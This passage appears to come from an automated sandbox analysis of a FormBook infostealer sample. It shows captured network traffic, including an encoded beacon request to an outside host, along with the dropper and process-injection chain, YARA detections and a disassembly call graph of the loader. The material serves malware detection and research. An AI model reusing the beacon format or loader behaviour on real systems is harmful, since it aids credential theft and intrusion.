pn01eEkyxM1hzREBrT29KvUnplFOFpm2yHsUBFO7TyOiwGUPvm-Z-rhmiFOZoEUaQtj2RY1m6zxx5RgOK(aQR(Ugp(8XZzkiODKNnB2EeYqgh3QVRfoIprzMb3y4K2YmO~DTkWTADVdV11RsL0koYK1cwvlrVaepJJJjJ5XerBU5b98CD8v(dM8acEKyK(iYOUrwAnSAQDisO~JJkBqitLUm9QO1P~7CWJIzjU-hGqLyxKZcbQ7qOEpzDres_pS~qRkVlPpcxjqi6CnT7XhiNpTwZudUBXQZooHH12nmZFkTviHLpTTQsgU39pQ4iLvbwt4AfB3dMs_u_kTs0WH3IMkpD0yZGpYFUw81D6jY38hckaaSvNQR-aNw0xOD_g-XFbTcS1NxVJThbQiOtyr2EWCfbAuE4Mv2q7izvIMd9d-OovrfOvfx6TjV8QzC-CwG_aT5Dbi7lT5c4OGODqdpEV2atP9YsUmYNs4MKCw~ZeuhoACff96TVxZLoS84RkOqxyWtXsZGDgVMedrIX2KDj7aZ-~-Ufxv(_GB2QiWxtnlaJ22cDWOL9fA6b~XoLr6jsinbk6_bcept7bexQaXyIBiY-Sr0toxQjtGzXE0ImaD1ZIJT0MWmOKEcHi08gXAwzYug0h6PlLMCmTOyE5vc1E_jllut7nHvy7YpG1nyxG75uRLwxfQj4jKIgQZaOhBMfqWZzyzFsNJFt84fHF0lrB0jgZ5KGL9N3a4AwvPkuwdpLKvFiocR01lbh1y~MVkp2jtLpjAUROsOcOQrBWJjNM7gscDXczjIEkF7u7jMSwa5kv4vBD7uM5K091-IFnozrVJoMmA6Lv_ys7yx0SwEd~Ybup2La9zxwcaiv69BpsnX9WVspt6kSb8nnfJ~BNABs3TKe2Cq1FViU(lBYfaOzMNjrHj2VL3et1Kc5pY3BqannqzkCoetoYZ8LRO8EbxehZJFSHNbaXqrtCKtcYsrdf1Z-4THLVRxDUUimzLHfVvJWF8ZePjRkigh7uFSDwIuxigkN8IMr51XqELjYsLKINNPqEaqDkd~78GPUecgKKmc7nPdz4YEJQv6hFvU7smgfvURj7htkH3stX-ouBeLsK1D8~qR7qFgk0Savg_Dgm-SJbsw71J5RByKxivESi_xr3ajMzkzJ7nTWtIo80K5_JKkxvuPwSfQhvRkyR1FA6je3Ywifs8LgGUKbd54QH8K48KFw4MUcvELWzBTr716uVpXYAIGloX3z3kTrhu8RFoZC2Zf_FPxMdT6MTf8707oPf0uY6Pe83n1g(Yo3cs7Ef9sR2SOA~PcCUzGeLsDEh6GMfFGc1-MkWeBYGMiMQlH6GUyqqTz9(NDdGZFsUGsrloay7ytAFlUVKRflYbU1iNlS6TTnXrb2(XzjrLBcDFfzlwFgMZIUrAdc~zx5IEhc9N8MEUieaHvSPN9Vq6tRoefv5ZDztSTMh_dGF3bwnI1jFEBq2Fi8DxbxfEIxVCWEdV6o0Yn2Wlz74BtRdCTH0KrotUIgKqPlEPCxWNaOL5r8TOyOk_(b4V7Z2TUNWBaSN_8LhoqJefP9AJfAxlMM(B5gIhjmBUgdctxoo5CiyOZfOn4lxfVlMRkFGD~iqkUFW_4zjTeYyrioEhC-R82PDX0QoGSk9T2H61ezqfqMyk6aHuG7aKmVSgO_uUIkNDL33t7SZfmdLUyBsUULkgg0hBiV50BH5sROiRU6mbTRV02cqf(8U9H_fWWez2ASvnCPzmCk4Uys6P2VRvFbx1ZHQwmjW8DV1YgV83s-(7w3KRBIVW(wyMIIt2OW0ebGmSTw0Kp2Ef(0Lqjpe_t_LhRrcOOyG93COIBNJHAZ9qPnVT2nnAm0G670Y6AXEBF0yyigc6u8FlVS4fRJTc7MoSwtwDIp~Ouda4MVNzmaCk8gnLpdGZhjK-bWkkwq2Zu1kZpYzQIMgQ18zmBX
                                                                                                                      Mar 20, 2023 09:09:17.723800898 CET167INHTTP/1.1 405 Not Allowed
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:17 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 157
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                      9192.168.2.349708213.171.195.10580C:\Windows\explorer.exe
                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                      Mar 20, 2023 09:09:20.250706911 CET168OUTGET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1
                                                                                                                      Host: www.g2fm.co.uk
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                                      Data Ascii:
                                                                                                                      Mar 20, 2023 09:09:20.283874989 CET168INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.20.1
                                                                                                                      Date: Mon, 20 Mar 2023 08:09:20 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 6486
                                                                                                                      Last-Modified: Tue, 10 May 2022 13:33:35 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "627a69af-1956"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Mar 20, 2023 09:09:20.283915043 CET169INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d
                                                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Domain parking page</title>
                                                                                                                      Mar 20, 2023 09:09:20.283966064 CET171INData Raw: 61 73 73 3d 22 63 61 72 64 2d 74 69 74 6c 65 20 63 61 72 64 2d 74 69 74 6c 65 2d 6c 67 22 3e 4c 6f 6f 6b 69 6e 67 20 74 6f 20 62 75 79 20 61 20 73 69 6d 69 6c 61 72 20 64 6f 6d 61 69 6e 20 74 6f 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: ass="card-title card-title-lg">Looking to buy a similar domain to</p> <p class="card-subtitle"><span class="domainVar"></span>?</p> <a class="btn btn-primary" onclick="searchSimilarDomains()" rel="nofollow">STAR
                                                                                                                      Mar 20, 2023 09:09:20.283993959 CET172INData Raw: 45 6c 6c 69 70 73 65 5f 32 37 30 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 45 6c 6c 69 70 73 65 20 32 37 30 36 22 20 63 78 3d 22 35 35 22 20 63 79 3d 22 34 35 2e 35 22 20 72 78 3d 22 35 35 22 20 72 79 3d 22 34 35 2e 35 22 20 74 72 61 6e 73 66 6f
                                                                                                                      Data Ascii: Ellipse_2706" data-name="Ellipse 2706" cx="55" cy="45.5" rx="55" ry="45.5" transform="translate(1085 526)" fill="#ffda84"/> <g id="Group_12722" data-name="Group 12722" transform="translate(1119.711 505.758)">
                                                                                                                      Mar 20, 2023 09:09:20.284020901 CET173INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 50 61 74 68 5f 31 36 37 38 31 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 31 36 37 38 31 22 20 64 3d 22 4d 2d 33 34 34 2e
                                                                                                                      Data Ascii: <path id="Path_16781" data-name="Path 16781" d="M-344.883,357.87a.085.085,0,0,1-.164,0,5.343,5.343,0,0,0-1.362-2.345,5.35,5.35,0,0,0-2.36-1.37.085.085,0,0,1,0-.164,5.459,5.459,0,0,0,2.382-1.415,5.458,5.458,0,0,0,1.3
                                                                                                                      Mar 20, 2023 09:09:20.284226894 CET175INData Raw: 6c 65 22 3e 41 63 63 65 73 73 20 61 6c 6c 20 74 68 65 20 74 6f 6f 6c 73 20 79 6f 75 20 6e 65 65 64 20 66 6f 72 20 6f 6e 6c 69 6e 65 20 73 75 63 63 65 73 73 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                      Data Ascii: le">Access all the tools you need for online success.</p> <a class="btn hooverable btn-secondary btn-fix" href="https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_parking
                                                                                                                      Mar 20, 2023 09:09:20.284255981 CET175INData Raw: 72 72 61 6c 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 68 5f 70 61 72 6b 69 6e 67 5f 64 61 63 60 3b 0a 7d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: rral&utm_campaign=fh_parking_dac`;}</script></html>


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:09:07:40
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:297210 bytes
                                                                                                                      MD5 hash:4832E17C1F6841AEE2E1984A429ED946
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:1
                                                                                                                      Start time:09:07:41
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
                                                                                                                      Imagebase:0xc50000
                                                                                                                      File size:59904 bytes
                                                                                                                      MD5 hash:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Antivirus matches:
                                                                                                                      • Detection: 51%, ReversingLabs
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:09:07:41
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\qhcqh.exe
                                                                                                                      Imagebase:0xc50000
                                                                                                                      File size:59904 bytes
                                                                                                                      MD5 hash:41C9E29A7ED3640682A0003BE2DF4D93
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Target ID:3
                                                                                                                      Start time:09:07:47
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                                                      Imagebase:0x7ff69fe90000
                                                                                                                      File size:3933184 bytes
                                                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Target ID:13
                                                                                                                      Start time:09:08:02
                                                                                                                      Start date:20/03/2023
                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Imagebase:0xe30000
                                                                                                                      File size:61952 bytes
                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                      Reputation:high

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:15.9%
                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                        Signature Coverage:16.4%
                                                                                                                        Total number of Nodes:1385
                                                                                                                        Total number of Limit Nodes:25
                                                                                                                        execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 